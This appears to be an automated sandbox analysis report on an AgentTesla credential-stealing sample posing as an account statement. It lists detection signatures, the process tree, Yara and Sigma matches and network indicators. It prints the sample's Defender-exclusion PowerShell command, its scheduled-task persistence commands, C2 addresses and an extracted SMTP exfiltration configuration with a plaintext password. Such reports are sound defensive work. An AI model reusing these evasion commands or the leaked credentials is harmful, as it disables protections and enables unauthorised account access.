
Windows Analysis Report
UPDATED SSTATEMENT OF ACCOUNT.exe

Overview

General Information

Sample name: UPDATED SSTATEMENT OF ACCOUNT.exe
Analysis ID: 1428829
MD5: 25e87d17f0c864ffdc217d43c82cc36c
SHA1: aecd0ff1a25d22ace6ab1c9650589ca916cabf3f
SHA256: 37fda41fdb04917e4c0da2880b51ba07e959d53a31a93a9b47785a5be8807bd7
Tags: AgentTesla, exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: MSBuild connects to smtp port
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • UPDATED SSTATEMENT OF ACCOUNT.exe (PID: 6516 cmdline: "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe" MD5: 25E87D17F0C864FFDC217D43C82CC36C)
    • powershell.exe (PID: 528 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 64 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2404 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6392 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 3392 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • TgfQNrhQjjseHY.exe (PID: 4460 cmdline: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe MD5: 25E87D17F0C864FFDC217D43C82CC36C)
    • schtasks.exe (PID: 7056 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpD609.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • MSBuild.exe (PID: 4548 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.tabcoeng.com", "Username": "tabco@tabcoeng.com", "Password": "TaSq3365!"}
Source | Rule | Description | Author | Strings
00000008.00000002.2160120971.0000000002F33000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000002.2160120971.0000000002F33000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
00000008.00000002.2160120971.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
Source | Rule | Description | Author | Strings
0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen
  • 0x323e9:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x3245b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x324e5:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x32577:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x325e1:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x32653:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x326e9:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x32779:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
8.2.MSBuild.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
8.2.MSBuild.exe.400000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security

                    Networking

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 135.181.124.14, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 3392, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49712

                    System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", ParentImage: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe, ParentProcessId: 6516, ParentProcessName: UPDATED SSTATEMENT OF ACCOUNT.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", ProcessId: 528, ProcessName: powershell.exe
Source: Network Connection | Author: Kiran kumar s, oscd.community | Data: DestinationIp: 208.95.112.1, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 3392, Protocol: tcp, SourceIp: 192.168.2.6, SourceIsIpv6: false, SourcePort: 49711
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpD609.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpD609.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe, ParentImage: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe, ParentProcessId: 4460, ParentProcessName: TgfQNrhQjjseHY.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpD609.tmp", ProcessId: 7056, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", ParentImage: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe, ParentProcessId: 6516, ParentProcessName: UPDATED SSTATEMENT OF ACCOUNT.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp", ProcessId: 6392, ProcessName: schtasks.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", ParentImage: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe, ParentProcessId: 6516, ParentProcessName: UPDATED SSTATEMENT OF ACCOUNT.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", ProcessId: 528, ProcessName: powershell.exe

                    Persistence and Installation Behavior

Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe", ParentImage: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe, ParentProcessId: 6516, ParentProcessName: UPDATED SSTATEMENT OF ACCOUNT.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp", ProcessId: 6392, ProcessName: schtasks.exe
                    No Snort rule has matched


                    AV Detection

Source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.raw.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.tabcoeng.com", "Username": "tabco@tabcoeng.com", "Password": "TaSq3365!"}
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | ReversingLabs: Detection: 36%
Source: UPDATED SSTATEMENT OF ACCOUNT.exe | ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Joe Sandbox ML: detected
Source: UPDATED SSTATEMENT OF ACCOUNT.exe | Joe Sandbox ML: detected
Source: UPDATED SSTATEMENT OF ACCOUNT.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49720 version: TLS 1.0
Source: UPDATED SSTATEMENT OF ACCOUNT.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: zzUBZ.pdb | source: UPDATED SSTATEMENT OF ACCOUNT.exe, TgfQNrhQjjseHY.exe.0.dr
Source: Binary string: zzUBZ.pdbSHA256 | source: UPDATED SSTATEMENT OF ACCOUNT.exe, TgfQNrhQjjseHY.exe.0.dr
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\NULL
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | File opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULL
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULL
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | File opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Code function: 4x nop then jmp 0178D983h (0_2_0178D0F4)
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Code function: 4x nop then jmp 023DCE4Bh (9_2_023DC5D1)

                    Networking

Source: Yara match | File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, type: UNPACKEDPE
Source: global traffic | TCP traffic: 192.168.2.6:49712 -> 135.181.124.14:587
Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 208.95.112.1
Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
Source: Joe Sandbox View | JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: unknown | DNS query: name: ip-api.com
Source: unknown | HTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49720 version: TLS 1.0
Source: unknown | TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | DNS traffic detected: queries for: ip-api.com
Source: MSBuild.exe, 00000008.00000002.2160120971.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3349333951.0000000002A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2160120971.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TgfQNrhQjjseHY.exe, 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3346859108.0000000000CD7000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3349333951.0000000002A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: MSBuild.exe, 00000008.00000002.2160120971.0000000002F65000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3349333951.0000000002A9E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.tabcoeng.com
Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2141321180.0000000003251000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2160120971.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, TgfQNrhQjjseHY.exe, 00000009.00000002.2178810898.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000D.00000002.3349333951.0000000002A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: UPDATED SSTATEMENT OF ACCOUNT.exe, TgfQNrhQjjseHY.exe.0.dr | String found in binary or memory: http://tempuri.org/x.xsd?MultiGames.Properties.Resources
Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, TgfQNrhQjjseHY.exe, 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
Source: UPDATED SSTATEMENT OF ACCOUNT.exe, TgfQNrhQjjseHY.exe.0.dr | String found in binary or memory: https://github.com/zuppao).
Source: unknown | Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, cPKWk.cs | .Net Code: iLhfhcxZ
Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.raw.unpack, cPKWk.cs | .Net Code: iLhfhcxZ

                    System Summary

Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.5910000.4.raw.unpack, LoginForm.cs | Large array initialization: array initializer size 33603
Source: UPDATED SSTATEMENT OF ACCOUNT.exe, Form1.cs | Long String: Length: 131612
Source: TgfQNrhQjjseHY.exe.0.dr, Form1.cs | Long String: Length: 131612
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2145510029.0000000005910000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs UPDATED SSTATEMENT OF ACCOUNT.exe
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename32633afe-7a30-4194-b5fc-3a5fc4fdc868.exe4 vs UPDATED SSTATEMENT OF ACCOUNT.exe
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2146566265.0000000008930000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs UPDATED SSTATEMENT OF ACCOUNT.exe
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2137873922.000000000135E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs UPDATED SSTATEMENT OF ACCOUNT.exe
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2142116748.0000000004C75000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs UPDATED SSTATEMENT OF ACCOUNT.exe
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000000.2100247241.0000000000E0E000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamezzUBZ.exe< vs UPDATED SSTATEMENT OF ACCOUNT.exe
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe, 00000000.00000002.2141321180.0000000003251000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilename32633afe-7a30-4194-b5fc-3a5fc4fdc868.exe4 vs UPDATED SSTATEMENT OF ACCOUNT.exe
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe | Binary or memory string: OriginalFilenamezzUBZ.exe< vs UPDATED SSTATEMENT OF ACCOUNT.exe
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: UPDATED SSTATEMENT OF ACCOUNT.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: TgfQNrhQjjseHY.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, cPs8D.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, 72CF8egH.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, G5CXsdn.cs | Cryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, 3uPsILA6U.cs | Cryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, 6oQOw74dfIt.cs | Cryptographic APIs: 'TransformFinalBlock'
